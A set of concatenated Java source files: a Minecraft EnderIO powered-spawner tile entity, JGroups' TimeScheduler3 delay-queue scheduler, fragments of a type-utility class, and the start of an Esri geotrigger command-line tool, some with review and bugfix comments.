    public static Function<Class<?>, ParameterizedType> toParameterizedType()
    {
        return new Function<Class<?>, ParameterizedType>()
        {
            @Override
            public ParameterizedType apply(@Nullable Class<?> input)
            {
                return new ParameterizedType(input);
            }
        };
    }

    /** Guava function creating a type from a JVM internal (path) name. */
    public static Function<String, ParameterizedType> pathToParameterizedType()
    {
        return new Function<String, ParameterizedType>()
        {
            @Override
            public ParameterizedType apply(@Nullable String input)
            {
                return typeFromPathName(input);
            }
        };
    }
}
package crazypants.enderio.machine.spawner;

import net.minecraft.entity.Entity;
import net.minecraft.entity.EntityList;
import net.minecraft.entity.EntityLiving;
import net.minecraft.entity.EnumCreatureType;
import net.minecraft.item.ItemStack;
import net.minecraft.nbt.NBTTagCompound;
import net.minecraft.util.AxisAlignedBB;

import crazypants.enderio.EnderIO;
import crazypants.enderio.ModObject;
import crazypants.enderio.config.Config;
import crazypants.enderio.machine.AbstractPoweredTaskEntity;
import crazypants.enderio.machine.IMachineRecipe;
import crazypants.enderio.machine.IPoweredTask;
import crazypants.enderio.machine.PoweredTask;
import crazypants.enderio.machine.SlotDefinition;
import crazypants.enderio.power.BasicCapacitor;
import crazypants.enderio.power.Capacitors;
import crazypants.enderio.power.ICapacitor;

/**
 * Powered mob spawner tile entity with two modes:
 * <ul>
 *   <li><b>spawn mode</b> — periodically spawns the captured entity type near the block;</li>
 *   <li><b>capture mode</b> — fills an empty soul vessel (slot 0) with the captured
 *       entity type and puts the result into slot 1.</li>
 * </ul>
 * Power use and task duration scale with the installed capacitor tier and a
 * per-entity cost multiplier from {@link PoweredSpawnerConfig}.
 */
public class TilePoweredSpawner extends AbstractPoweredTaskEntity {

	// Task-duration bounds in ticks (configurable).
	public static final int MIN_SPAWN_DELAY_BASE = Config.poweredSpawnerMinDelayTicks;
	public static final int MAX_SPAWN_DELAY_BASE = Config.poweredSpawnerMaxDelayTicks;

	// One capacitor tier per upgrade level; extraction rate is 1.25x the per-tick draw.
	public static final int POWER_PER_TICK_ONE = Config.poweredSpawnerLevelOnePowerPerTickRF;
	private static final BasicCapacitor CAP_ONE = new BasicCapacitor((int) (POWER_PER_TICK_ONE * 1.25),
			Capacitors.BASIC_CAPACITOR.capacitor.getMaxEnergyStored());

	public static final int POWER_PER_TICK_TWO = Config.poweredSpawnerLevelTwoPowerPerTickRF;
	private static final BasicCapacitor CAP_TWO = new BasicCapacitor((int) (POWER_PER_TICK_TWO * 1.25),
			Capacitors.ACTIVATED_CAPACITOR.capacitor.getMaxEnergyStored());

	public static final int POWER_PER_TICK_THREE = Config.poweredSpawnerLevelThreePowerPerTickRF;
	private static final BasicCapacitor CAP_THREE = new BasicCapacitor((int) (POWER_PER_TICK_THREE * 1.25),
			Capacitors.ENDER_CAPACITOR.capacitor.getMaxEnergyStored());

	// <= 0 disables the player-proximity requirement for spawning.
	public static final int MIN_PLAYER_DISTANCE = Config.poweredSpawnerMaxPlayerDistance;

	// NOTE(review): the config field name contains a typo ("Spaw") — it is an external
	// key and must not be changed here.
	public static final boolean USE_VANILLA_SPAWN_CHECKS = Config.poweredSpawnerUseVanillaSpawChecks;

	// Sentinel entity name meaning "no entity captured yet".
	private static final String NULL_ENTITY_NAME = "None";

	private String entityTypeName;
	private boolean isSpawnMode = true;
	private int powerUsePerTick;
	// Budget of placement attempts shared across the spawns of one completed task.
	private int remainingSpawnTries;

	public TilePoweredSpawner() {
		super(new SlotDefinition(1, 1, 1));
		entityTypeName = NULL_ENTITY_NAME;
	}

	public boolean isSpawnMode() {
		return isSpawnMode;
	}

	/** Switches between spawn and capture mode; cancels the running task on a change. */
	public void setSpawnMode(boolean isSpawnMode) {
		if(isSpawnMode != this.isSpawnMode) {
			currentTask = null;
		}
		this.isSpawnMode = isSpawnMode;
	}

	/**
	 * Called when a powered task finishes: either spawns a batch of entities
	 * (spawn mode) or fills the soul vessel in slot 0 into slot 1 (capture mode).
	 */
	@Override
	protected void taskComplete() {
		super.taskComplete();
		if(isSpawnMode) {
			remainingSpawnTries = Config.poweredSpawnerSpawnCount + Config.poweredSpawnerMaxSpawnTries;
			for (int i = 0; i < Config.poweredSpawnerSpawnCount && remainingSpawnTries > 0; ++i) {
				if(!trySpawnEntity()) {
					break; // placement budget exhausted or spawn blocked
				}
			}
		} else {
			if(getStackInSlot(0) == null || getStackInSlot(1) != null || !hasEntityName()) {
				return; // no empty vessel, output occupied, or nothing captured
			}
			ItemStack res = EnderIO.itemSoulVessel.createVesselWithEntityStub(getEntityName());
			decrStackSize(0, 1);
			setInventorySlotContents(1, res);
		}
	}

	/**
	 * Recomputes the capacitor and per-tick power draw for the current capacitor tier,
	 * scaled by the captured entity's configured cost multiplier.
	 */
	@Override
	public void onCapacitorTypeChange() {
		ICapacitor refCap;
		int basePowerUse;
		switch (getCapacitorType()) {
		default:
		case BASIC_CAPACITOR:
			refCap = CAP_ONE;
			basePowerUse = POWER_PER_TICK_ONE;
			break;
		case ACTIVATED_CAPACITOR:
			refCap = CAP_TWO;
			basePowerUse = POWER_PER_TICK_TWO;
			break;
		case ENDER_CAPACITOR:
			refCap = CAP_THREE;
			basePowerUse = POWER_PER_TICK_THREE;
			break;
		}
		double multiplier = PoweredSpawnerConfig.getInstance().getCostMultiplierFor(getEntityName());
		setCapacitor(new BasicCapacitor((int) (refCap.getMaxEnergyExtracted() * multiplier), refCap.getMaxEnergyStored()));
		powerUsePerTick = (int) Math.ceil(basePowerUse * multiplier);
		forceClientUpdate = true;
	}

	@Override
	public String getMachineName() {
		return ModObject.blockPoweredSpawner.unlocalisedName;
	}

	/** In capture mode, the input slot accepts only empty soul vessels. */
	@Override
	protected boolean isMachineItemValidForSlot(int i, ItemStack itemstack) {
		if(itemstack == null || isSpawnMode) {
			return false;
		}
		if(slotDefinition.isInputSlot(i)) {
			return itemstack.getItem() == EnderIO.itemSoulVessel && !EnderIO.itemSoulVessel.containsSoul(itemstack);
		}
		return false;
	}

	/**
	 * Gate for starting a new task: requires a captured entity; spawn mode additionally
	 * needs a player in range (when configured), capture mode needs an input vessel and
	 * a free output slot. Returns a placeholder recipe since no real recipe is involved.
	 */
	@Override
	protected IMachineRecipe canStartNextTask(float chance) {
		if(!hasEntityName()) {
			return null;
		}
		if(isSpawnMode) {
			if(MIN_PLAYER_DISTANCE > 0) {
				if(worldObj.getClosestPlayer(xCoord + 0.5, yCoord + 0.5, zCoord + 0.5, MIN_PLAYER_DISTANCE) == null) {
					return null;
				}
			}
		} else {
			if(getStackInSlot(0) == null || getStackInSlot(1) != null) {
				return null;
			}
		}
		return new DummyRecipe();
	}

	@Override
	protected boolean startNextTask(IMachineRecipe nextRecipe, float chance) {
		return super.startNextTask(nextRecipe, chance);
	}

	@Override
	public int getPowerUsePerTick() {
		return powerUsePerTick;
	}

	// No real item inputs drive the task cycle, so always report inputs present/insertable.
	@Override
	protected boolean hasInputStacks() {
		return true;
	}

	@Override
	protected boolean canInsertResult(float chance, IMachineRecipe nextRecipe) {
		return true;
	}

	@Override
	public void readCommon(NBTTagCompound nbtRoot) {
		//Must read the mob type first so we know the multiplier to be used when calculating input/output power
		String mobType = BlockPoweredSpawner.readMobTypeFromNBT(nbtRoot);
		if(mobType == null) {
			mobType = NULL_ENTITY_NAME;
		}
		entityTypeName = mobType;
		// Default legacy tiles (no flag saved) to spawn mode.
		if(!nbtRoot.hasKey("isSpawnMode")) {
			isSpawnMode = true;
		} else {
			isSpawnMode = nbtRoot.getBoolean("isSpawnMode");
		}
		super.readCommon(nbtRoot);
	}

	@Override
	public void writeCommon(NBTTagCompound nbtRoot) {
		if(hasEntityName()) {
			BlockPoweredSpawner.writeMobTypeToNBT(nbtRoot, getEntityName());
		} else {
			BlockPoweredSpawner.writeMobTypeToNBT(nbtRoot, null);
		}
		nbtRoot.setBoolean("isSpawnMode", isSpawnMode);
		super.writeCommon(nbtRoot);
	}

	/** Client-side: emit smoke/flame particles inside the block while active. */
	@Override
	protected void updateEntityClient() {
		if(isActive()) {
			double x = xCoord + worldObj.rand.nextFloat();
			double y = yCoord + worldObj.rand.nextFloat();
			double z = zCoord + worldObj.rand.nextFloat();
			worldObj.spawnParticle("smoke", x, y, z, 0.0D, 0.0D, 0.0D);
			worldObj.spawnParticle("flame", x, y, z, 0.0D, 0.0D, 0.0D);
		}
		super.updateEntityClient();
	}

	/**
	 * Creates the timed task for one spawn/capture cycle. Spawn mode randomizes the
	 * delay between the configured bounds; capture mode uses the fixed midpoint.
	 * Higher capacitor tiers halve/quarter the delay; required energy = draw * duration.
	 */
	@Override
	protected IPoweredTask createTask(IMachineRecipe nextRecipe, float chance) {
		PoweredTask res = new PoweredTask(nextRecipe, chance, getRecipeInputs());

		int ticksDelay;
		if(isSpawnMode) {
			ticksDelay = TilePoweredSpawner.MIN_SPAWN_DELAY_BASE
					+ (int) Math.round((TilePoweredSpawner.MAX_SPAWN_DELAY_BASE - TilePoweredSpawner.MIN_SPAWN_DELAY_BASE) * Math.random());
		} else {
			ticksDelay = TilePoweredSpawner.MAX_SPAWN_DELAY_BASE
					- ((TilePoweredSpawner.MAX_SPAWN_DELAY_BASE - TilePoweredSpawner.MIN_SPAWN_DELAY_BASE) / 2);
		}
		if(getCapacitorType().ordinal() == 1) {
			ticksDelay /= 2;
		} else if(getCapacitorType().ordinal() == 2) {
			ticksDelay /= 4;
		}
		int powerPerTick = getPowerUsePerTick();
		res.setRequiredEnergy(powerPerTick * ticksDelay);
		return res;
	}

	/**
	 * Collision/space check for a spawn candidate; optionally also applies the
	 * vanilla spawn rules (light level, etc.) when configured.
	 */
	protected boolean canSpawnEntity(EntityLiving entityliving) {
		boolean spaceClear = worldObj.checkNoEntityCollision(entityliving.boundingBox)
				&& worldObj.getCollidingBoundingBoxes(entityliving, entityliving.boundingBox).isEmpty()
				&& (!worldObj.isAnyLiquid(entityliving.boundingBox) || entityliving.isCreatureType(EnumCreatureType.waterCreature, false));
		if(spaceClear && USE_VANILLA_SPAWN_CHECKS) {
			//Full checks for lighting, dimension etc
			spaceClear = entityliving.getCanSpawnHere();
		}
		return spaceClear;
	}

	/**
	 * Instantiates the captured entity type. When forceAlive is set (and despawn
	 * tracking applies), tags the entity with the spawn timestamp and marks it
	 * persistent via func_110163_bv (MCP name for "set persistence required").
	 */
	Entity createEntity(boolean forceAlive) {
		Entity ent = EntityList.createEntityByName(getEntityName(), worldObj);
		if(forceAlive && MIN_PLAYER_DISTANCE <= 0 && Config.poweredSpawnerDespawnTimeSeconds > 0 && ent instanceof EntityLiving) {
			ent.getEntityData().setLong(BlockPoweredSpawner.KEY_SPAWNED_BY_POWERED_SPAWNER, worldObj.getTotalWorldTime());
			((EntityLiving) ent).func_110163_bv();
		}
		return ent;
	}

	/**
	 * Attempts to place one entity near the block, consuming placement attempts from
	 * remainingSpawnTries until a clear position is found. Respects the configured
	 * nearby-entity cap. Returns true when an entity was spawned.
	 */
	protected boolean trySpawnEntity() {
		Entity entity = createEntity(true);
		if(!(entity instanceof EntityLiving)) {
			return false;
		}
		EntityLiving entityliving = (EntityLiving) entity;

		int spawnRange = Config.poweredSpawnerSpawnRange;

		if(Config.poweredSpawnerMaxNearbyEntities > 0) {
			// Count same-type entities in a box around the spawner to enforce the cap.
			int nearbyEntities = worldObj.getEntitiesWithinAABB(
					entity.getClass(),
					AxisAlignedBB.getBoundingBox(
							xCoord - spawnRange*2, yCoord - 4, zCoord - spawnRange*2,
							xCoord + spawnRange*2, yCoord + 4, zCoord + spawnRange*2)).size();

			if(nearbyEntities >= Config.poweredSpawnerMaxNearbyEntities) {
				return false;
			}
		}

		while(remainingSpawnTries-- > 0) {
			// Random position within spawnRange horizontally and +/-1 block vertically.
			double x = xCoord + (worldObj.rand.nextDouble() - worldObj.rand.nextDouble()) * spawnRange;
			double y = yCoord + worldObj.rand.nextInt(3) - 1;
			double z = zCoord + (worldObj.rand.nextDouble() - worldObj.rand.nextDouble()) * spawnRange;
			entity.setLocationAndAngles(x, y, z, worldObj.rand.nextFloat() * 360.0F, 0.0F);

			if(canSpawnEntity(entityliving)) {
				entityliving.onSpawnWithEgg(null);
				worldObj.spawnEntityInWorld(entityliving);
				worldObj.playAuxSFX(2004, xCoord, yCoord, zCoord, 0); // vanilla spawner particles/sound
				entityliving.spawnExplosionParticle();
				return true;
			}
		}

		return false;
	}

	public String getEntityName() {
		return entityTypeName;
	}

	/** True when a real entity type (not the "None" sentinel) has been captured. */
	public boolean hasEntityName() {
		return !NULL_ENTITY_NAME.equals(entityTypeName);
	}

}
package org.jgroups.util;

import org.jgroups.Global;
import org.jgroups.logging.Log;
import org.jgroups.logging.LogFactory;

import java.util.List;
import java.util.concurrent.*;

/**
 * Implementation of {@link TimeScheduler}. Based on the {@link TimeScheduler2} implementation
 * with various fixes and enhancements. Uses a {@link DelayQueue} to order tasks according to execution times
 * @author Bela Ban
 * @since 3.3
 */
public class TimeScheduler3 implements TimeScheduler, Runnable {
    /** Thread pool used to execute the tasks */
    protected final ThreadPoolExecutor pool;

    /** DelayQueue with tasks being sorted according to execution times (next execution first) */
    protected final BlockingQueue<Task> queue=new DelayQueue<Task>();

    /** Thread which removes tasks ready to be executed from the queue and submits them to the pool for execution */
    protected volatile Thread runner;

    protected static final Log log=LogFactory.getLog(TimeScheduler3.class);

    // Optional factory for the runner thread and the fallback threads spawned on pool rejection.
    protected ThreadFactory timer_thread_factory=null;

    // Scheduling modes: dynamic (interval from TimeScheduler.Task.nextInterval()),
    // fixed_rate (delays measured from the initial schedule time) and
    // fixed_delay (delays measured from the end of each execution).
    protected static enum TaskType {dynamic, fixed_rate, fixed_delay}

    /**
     * Create a scheduler that executes tasks in dynamically adjustable intervals
     */
    public TimeScheduler3() {
        pool=new ThreadPoolExecutor(4, 10, 5000, TimeUnit.MILLISECONDS, new LinkedBlockingQueue<Runnable>(5000),
                                    Executors.defaultThreadFactory(), new ThreadPoolExecutor.CallerRunsPolicy());
        start();
    }

    /**
     * Create a scheduler with a custom thread factory, pool sizing and rejection policy.
     * The runner thread is started immediately.
     */
    public TimeScheduler3(ThreadFactory factory, int min_threads, int max_threads, long keep_alive_time, int max_queue_size,
                          String rejection_policy) {
        timer_thread_factory=factory;
        pool=new ThreadPoolExecutor(min_threads, max_threads,keep_alive_time, TimeUnit.MILLISECONDS,
                                    new LinkedBlockingQueue<Runnable>(max_queue_size), factory, Util.parseRejectionPolicy(rejection_policy));
        start();
    }

    public void setThreadFactory(ThreadFactory f) {pool.setThreadFactory(f);}
    public int getMinThreads() {return pool.getCorePoolSize();}
    public void setMinThreads(int size) {pool.setCorePoolSize(size);}
    public int getMaxThreads() {return pool.getMaximumPoolSize();}
    public void setMaxThreads(int size) {pool.setMaximumPoolSize(size);}
    public long getKeepAliveTime() {return pool.getKeepAliveTime(TimeUnit.MILLISECONDS);}
    public void setKeepAliveTime(long time) {pool.setKeepAliveTime(time, TimeUnit.MILLISECONDS);}
    public int getCurrentThreads() {return pool.getPoolSize();}
    public int getQueueSize() {return pool.getQueue().size();}
    public int size() {return queue.size();}
    public String toString() {return getClass().getSimpleName();}
    public boolean isShutdown() {return pool.isShutdown();}

    /** Returns a newline-separated listing of all queued tasks, marking cancelled ones. */
    public String dumpTimerTasks() {
        StringBuilder sb=new StringBuilder();
        for(Task task: queue) {
            sb.append(task);
            if(task.isCancelled())
                sb.append(" (cancelled)");
            sb.append("\n");
        }
        return sb.toString();
    }

    /**
     * Submits the task to the pool for immediate execution. A TimeScheduler.Task is wrapped
     * into a dynamic RecurringTask so it gets rescheduled after running.
     */
    public void execute(Runnable task) {
        submitToPool(task instanceof TimeScheduler.Task?
                       new RecurringTask(task, TaskType.dynamic, 0, ((TimeScheduler.Task)task).nextInterval(), TimeUnit.MILLISECONDS)
                       : new Task(task)); // we'll execute the task directly
    }

    /** Schedules a one-shot task after the given initial delay. */
    public Future<?> schedule(Runnable work, long initial_delay, TimeUnit unit) {
        return doSchedule(new Task(work, initial_delay, unit), initial_delay);
    }

    /** Schedules a recurring task; each delay is measured from the end of the previous execution. */
    public Future<?> scheduleWithFixedDelay(Runnable work, long initial_delay, long delay, TimeUnit unit) {
        return scheduleRecurring(work, TaskType.fixed_delay, initial_delay, delay, unit);
    }

    /** Schedules a recurring task; execution times are initial_delay + n*delay from the initial schedule. */
    public Future<?> scheduleAtFixedRate(Runnable work, long initial_delay, long delay, TimeUnit unit) {
        return scheduleRecurring(work,TaskType.fixed_rate,initial_delay,delay,unit);
    }

    /**
     * Schedule a task for execution at varying intervals. After execution, the task will get rescheduled after
     * {@link org.jgroups.util.TimeScheduler.Task#nextInterval()} milliseconds. The task is never done until
     * nextInterval() returns a value <= 0 or the task is cancelled.<p/>
     * Note that the task is rescheduled relative to the last time it actually executed. This is similar to
     * {@link #scheduleWithFixedDelay(Runnable,long,long,java.util.concurrent.TimeUnit)}.
     * @param work the task to execute
     */
    public Future<?> scheduleWithDynamicInterval(TimeScheduler.Task work) {
        return scheduleRecurring(work, TaskType.dynamic, work.nextInterval(), 0, TimeUnit.MILLISECONDS);
    }

    protected void start() {
        startRunner();
    }

    /**
     * Stops the timer, cancelling all tasks
     */
    public void stop() {
        stopRunner();

        // we may need to do multiple iterations as the iterator works on a copy and tasks might have been added just
        // after the iterator() call returned
        while(!queue.isEmpty())
            for(Task entry: queue) {
                entry.cancel(true);
                queue.remove(entry);
            }
        queue.clear();

        List<Runnable> remaining_tasks=pool.shutdownNow();
        for(Runnable task: remaining_tasks) {
            if(task instanceof Future) {
                Future future=(Future)task;
                future.cancel(true);
            }
        }
        pool.getQueue().clear();
        try {
            pool.awaitTermination(Global.THREADPOOL_SHUTDOWN_WAIT_TIME, TimeUnit.MILLISECONDS);
        }
        catch(InterruptedException e) {
        }
    }

    /**
     * Runner loop: takes the next due task from the delay queue and hands it to the pool.
     * Terminates when this thread is no longer the designated runner (see stopRunner()).
     */
    public void run() {
        while(Thread.currentThread() == runner) {
            try {
                final Task entry=queue.take();
                submitToPool(entry);
            }
            catch(InterruptedException interrupted) {
                // flag is cleared and we check if the loop should be terminated at the top of the loop
            }
            catch(Throwable t) {
                log.error("failed submitting task to thread pool", t);
            }
        }
    }

    protected Future<?> scheduleRecurring(Runnable work, TaskType type, long initial_delay, long delay, TimeUnit unit) {
        return doSchedule(new RecurringTask(work, type, initial_delay, delay, unit), initial_delay);
    }

    /**
     * Common scheduling path: executes immediately when the delay is non-positive,
     * otherwise enqueues the task for the runner. Returns null when already shut down.
     */
    protected Future<?> doSchedule(Task task, long initial_delay) {
        if(task.getRunnable() == null)
            throw new NullPointerException();
        if (isShutdown())
            return null;

        if(initial_delay <= 0) {
            submitToPool(task);
            return task;
        }
        return add(task);
    }

    /**
     * Hands the task to the thread pool. If the pool rejects it (only with the "abort"
     * rejection policy), a temporary one-off thread runs the task instead.
     */
    protected void submitToPool(final Task entry) {
        try {
            pool.execute(entry);
        }
        catch(RejectedExecutionException rejected) { // only thrown if rejection policy is "abort"
            Thread thread=timer_thread_factory != null?
              timer_thread_factory.newThread(entry, "Timer temp thread")
              : new Thread(entry, "Timer temp thread");
            thread.start();
        }
    }

    /** Enqueues the task for the runner thread; returns null when the runner is not alive. */
    protected Task add(Task task) {
        if(!isRunning())
            return null;
        queue.add(task);
        return task;
    }

    protected boolean isRunning() {
        Thread tmp=runner;
        return tmp != null && tmp.isAlive();
    }

    // Restarts the runner thread; any previous runner is stopped first.
    protected synchronized void startRunner() {
        stopRunner();
        runner=timer_thread_factory != null? timer_thread_factory.newThread(this, "Timer runner") : new Thread(this, "Timer runner");
        runner.start();
    }

    // Clears the runner reference (the loop condition in run()), interrupts the old thread
    // and waits briefly for it to die, then drops all queued tasks.
    protected synchronized void stopRunner() {
        Thread tmp=runner;
        runner=null;
        if(tmp != null) {
            tmp.interrupt();
            try {tmp.join(500);} catch(InterruptedException e) {}
        }
        queue.clear();
    }

    /**
     * One-shot task wrapper. Orders itself in the DelayQueue by remaining time
     * (creation_time + delay, both in nanoseconds).
     * NOTE(review): get() returns null immediately rather than blocking for completion,
     * and cancel() does not interrupt a running task — callers should not rely on
     * full Future semantics here.
     */
    public static class Task implements Runnable, Delayed, Future {
        protected final Runnable   runnable;      // the task to execute
        protected long             creation_time; // time (in ns) at which the task was created
        protected long             delay;         // time (in ns) after which the task should execute
        protected volatile boolean cancelled;
        protected volatile boolean done;

        public Task(Runnable runnable) {
            this.runnable=runnable;
        }

        public Task(Runnable runnable, long initial_delay, TimeUnit unit) {
            this.creation_time=System.nanoTime();
            this.delay=TimeUnit.NANOSECONDS.convert(initial_delay, unit);
            this.runnable=runnable;
            if(runnable == null)
                throw new IllegalArgumentException("runnable cannot be null");
        }

        public Runnable getRunnable() {return runnable;}

        public int compareTo(Delayed o) {
            long my_delay=getDelay(TimeUnit.NANOSECONDS), other_delay=o.getDelay(TimeUnit.NANOSECONDS);
            return Long.compare(my_delay, other_delay);
        }

        public long getDelay(TimeUnit unit) {
            // time (in ns) until execution, can be negative when already elapsed
            long remaining_time=delay - (System.nanoTime() - creation_time);
            return unit.convert(remaining_time, TimeUnit.NANOSECONDS);
        }

        public boolean cancel(boolean mayInterruptIfRunning) {
            boolean retval=!isDone();
            cancelled=true;
            return retval;
        }

        public boolean isCancelled() {return cancelled;}
        public boolean isDone()      {return done || cancelled;}
        public Object  get() throws InterruptedException, ExecutionException {return null;}

        public Object get(long timeout, TimeUnit unit) throws InterruptedException, ExecutionException, TimeoutException {
            return null;
        }

        public void run() {
            if(isDone())
                return;
            try {
                runnable.run();
            }
            catch(Throwable t) {
                log.error("failed executing task " + runnable, t);
            }
            finally {
                done=true;
            }
        }

        public String toString() {
            return runnable.toString();
        }
    }

    /** Tasks which runs more than once, either dynamic, fixed-rate or fixed-delay, until cancelled */
    protected class RecurringTask extends Task {
        protected final TaskType type;
        protected final long     period;        // ns
        protected final long     initial_delay; // ns
        protected int            cnt=1;         // number of invocations (for fixed rate invocations)

        public RecurringTask(Runnable runnable, TaskType type, long initial_delay, long delay, TimeUnit unit) {
            super(runnable, initial_delay, unit);
            // NOTE(review): initial_delay is always converted from MILLISECONDS here, ignoring 'unit'
            // (period below does use 'unit') — looks intentional upstream, but verify against callers.
            this.initial_delay=TimeUnit.NANOSECONDS.convert(initial_delay, TimeUnit.MILLISECONDS);
            this.type=type;
            period=TimeUnit.NANOSECONDS.convert(delay, unit);
            if(type == TaskType.dynamic && !(runnable instanceof TimeScheduler.Task))
                throw new IllegalArgumentException("Need to provide a TimeScheduler.Task as runnable when type is dynamic");
        }

        public void run() {
            if(isDone())
                return;
            super.run();
            if(cancelled)
                return;
            done=false; // run again

            switch(type) {
                case dynamic:
                    long next_interval=TimeUnit.NANOSECONDS.convert(((TimeScheduler.Task)runnable).nextInterval(), TimeUnit.MILLISECONDS);
                    if(next_interval <= 0) {
                        if(log.isTraceEnabled())
                            log.trace("task will not get rescheduled as interval is " + next_interval);
                        done=true;
                        return;
                    }
                    creation_time=System.nanoTime();
                    delay=next_interval;
                    break;
                case fixed_rate:
                    // delays accumulate from the original schedule time, so execution times stay on the grid
                    delay=initial_delay + cnt++ * period;
                    break;
                case fixed_delay:
                    // delay restarts from "now" (end of this execution)
                    creation_time=System.nanoTime();
                    delay=period;
                    break;
            }
            add(this); // schedule this task again
        }
    }
}
package de.esri.geotrigger.core;

import java.io.File;
import java.util.List;
import java.util.Map;

import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;
import org.json.JSONException;
import org.json.JSONObject;

import de.esri.geotrigger.config.Arcgis;
import de.esri.geotrigger.config.Configuration;
import de.esri.geotrigger.config.ConfigurationReader;
import de.esri.geotrigger.config.Notification;
import de.esri.geotrigger.config.Query;
import de.esri.geotrigger.config.ReaderException;
import de.esri.geotrigger.config.Trigger;

/**
 * Command line tool to create triggers and perform other geotrigger tasks
 * (create, create-from-service, run, delete triggers, delete tags).
 * The command and its parameters are parsed by {@link CommandLineArgs}.
 */
public class Geotrigger {
    private static Logger log = LogManager.getLogger(Geotrigger.class.getName());

    // Keys of the supported command line parameters.
    public static final String TRIGGER_ID = "triggerid";
    public static final String TRIGGER_IDS = "triggerids";
    public static final String DEVICE_IDS = "deviceids";
    public static final String TAGS = "tags";
    public static final String DIRECTION = "direction";
    public static final String LATITUDE = "latitude";
    public static final String LONGITUDE = "longitude";
    public static final String RADIUS = "radius";
    public static final String GEOJSON = "geojson";
    public static final String NOTIFICATION_TEXT = "notificationtext";
    public static final String NOTIFICATION_URL = "notificationurl";
    public static final String NOTIFICATION_ICON = "notificationicon";
    public static final String NOTIFICATION_SOUND = "notificationsound";
    public static final String NOTIFICATION_DATA = "notificationdata";
    public static final String CALLBACK_URL = "callbackurl";
    public static final String PROPERTIES = "properties";
    public static final String TRACKING_PROFILE = "trackingprofile";
    public static final String TIMES = "times";
    public static final String RATE_LIMIT = "ratelimit";
    public static final String BOUNDINGBOX_RETURN_FORMAT = "bboxreturnformat";
    // BUGFIX: this was "times" (copy-paste), colliding with the TIMES key, so the
    // geo return format argument could never be supplied independently.
    public static final String GEO_RETURN_FORMAT = "georeturnformat";
    public static final String FROM_TIMESTAMP = "fromtimestamp";
    public static final String TO_TIMESTAMP = "totimestamp";
    public static final String CLIENTID = "clientid";
    public static final String CLIENTSECRET = "clientsecret";
    public static final String CONFIGFILE = "configfile";

    /**
     * Entry point: dispatches to the handler matching the parsed command.
     * @param args raw command line arguments
     */
    public static void main(String[] args) {
        CommandLineArgs commandLineArgs = new CommandLineArgs(args);
        switch (commandLineArgs.getCommand()) {
        case CommandLineArgs.HELP:
            // write help
            break;
        case CommandLineArgs.CREATE_TRIGGER:
            // create Trigger
            createTrigger(commandLineArgs.getParameters());
            break;
        case CommandLineArgs.CREATE_TRIGGER_FROM_SERVICE:
            // create Trigger from feature service
            createTriggerFromService(commandLineArgs.getParameters());
            break;
        case CommandLineArgs.RUN_TRIGGER:
            // run Trigger
            runTrigger(commandLineArgs.getParameters());
            break;
        case CommandLineArgs.DELETE_TRIGGERS:
            // delete Trigger
            deleteTriggers(commandLineArgs.getParameters());
            break;
        case CommandLineArgs.DELETE_TAGS:
            // delete tags
            deleteTags(commandLineArgs.getParameters());
            break;
        }
    }

    /**
     * Splits a comma separated parameter value.
     * BUGFIX: the original called split() directly on a possibly null value and
     * threw a NullPointerException when the parameter was absent.
     * @param value the raw comma separated value; may be null
     * @return the split parts, or an empty array when the value is missing
     */
    private static String[] splitList(String value) {
        return value == null ? new String[0] : value.split(",");
    }

    /**
     * Parses a double parameter, logging malformed input.
     * An absent (null) value silently yields 0.0 instead of logging a spurious
     * "Error parsing ... value: null" as the original did.
     */
    private static double parseDoubleParam(String value, String name) {
        if (value == null) {
            return 0.0;
        }
        try {
            return Double.parseDouble(value);
        } catch (Exception ex) {
            log.error("Error parsing " + name + " value: " + ex.getMessage());
            return 0.0;
        }
    }

    /** Parses an int parameter; absent values yield 0, malformed input is logged. */
    private static int parseIntParam(String value, String name) {
        if (value == null) {
            return 0;
        }
        try {
            return Integer.parseInt(value);
        } catch (Exception ex) {
            log.error("Error parsing " + name + " value: " + ex.getMessage());
            return 0;
        }
    }

    /** Parses a long parameter; absent values yield 0, malformed input is logged. */
    private static long parseLongParam(String value, String name) {
        if (value == null) {
            return 0;
        }
        try {
            return Long.parseLong(value);
        } catch (Exception ex) {
            log.error("Error parsing " + name + " value: " + ex.getMessage());
            return 0;
        }
    }

    /**
     * Validates the client credentials, logging the specific missing piece.
     * @return true when both client id and secret are present
     */
    private static boolean checkCredentials(String clientId, String clientSecret) {
        if (Util.isEmpty(clientId)) {
            log.error("Client ID not set.");
            return false;
        }
        if (Util.isEmpty(clientSecret)) {
            log.error("Client secret not set.");
            return false;
        }
        return true;
    }

    /**
     * Create a geotrigger. Uses the circle variant (latitude/longitude/radius)
     * when all three are supplied, otherwise the GeoJSON variant.
     * @param params The parameters for the trigger.
     */
    private static void createTrigger(Map<String, String> params) {
        log.info("Creating trigger...");
        String triggerId = params.get(TRIGGER_ID);
        String[] tags = splitList(params.get(TAGS));
        String direction = params.get(DIRECTION);
        String latitudeStr = params.get(LATITUDE);
        double latitude = parseDoubleParam(latitudeStr, "latitude");
        String longitudeStr = params.get(LONGITUDE);
        double longitude = parseDoubleParam(longitudeStr, "longitude");
        String radiusStr = params.get(RADIUS);
        double radius = parseDoubleParam(radiusStr, "radius");
        String geoJson = params.get(GEOJSON);
        String notificationText = params.get(NOTIFICATION_TEXT);
        String notificationUrl = params.get(NOTIFICATION_URL);
        String notificationIcon = params.get(NOTIFICATION_ICON);
        String notificationSound = params.get(NOTIFICATION_SOUND);
        String notificationData = params.get(NOTIFICATION_DATA);
        String callBackUrl = params.get(CALLBACK_URL);
        String properties = params.get(PROPERTIES);
        String trackingProfile = params.get(TRACKING_PROFILE);
        int times = parseIntParam(params.get(TIMES), "times");
        int rateLimit = parseIntParam(params.get(RATE_LIMIT), "rate limit");
        String boundingBoxReturnFormat = params.get(BOUNDINGBOX_RETURN_FORMAT);
        String geoReturnFormat = params.get(GEO_RETURN_FORMAT);
        long fromTimestamp = parseLongParam(params.get(FROM_TIMESTAMP), "from timestamp");
        // BUGFIX: the original logged "from timestamp" for a malformed "to" timestamp.
        long toTimestamp = parseLongParam(params.get(TO_TIMESTAMP), "to timestamp");
        String clientId = params.get(CLIENTID);
        String clientSecret = params.get(CLIENTSECRET);
        if (!checkCredentials(clientId, clientSecret)) {
            return;
        }
        setAppId(clientId, clientSecret);
        TriggerHandler handler = new TriggerHandler();
        if (latitudeStr != null && longitudeStr != null && radiusStr != null) {
            handler.createTrigger(triggerId, tags, direction, latitude, longitude, radius, notificationText,
                    notificationUrl, notificationIcon, notificationSound, notificationData, callBackUrl, properties,
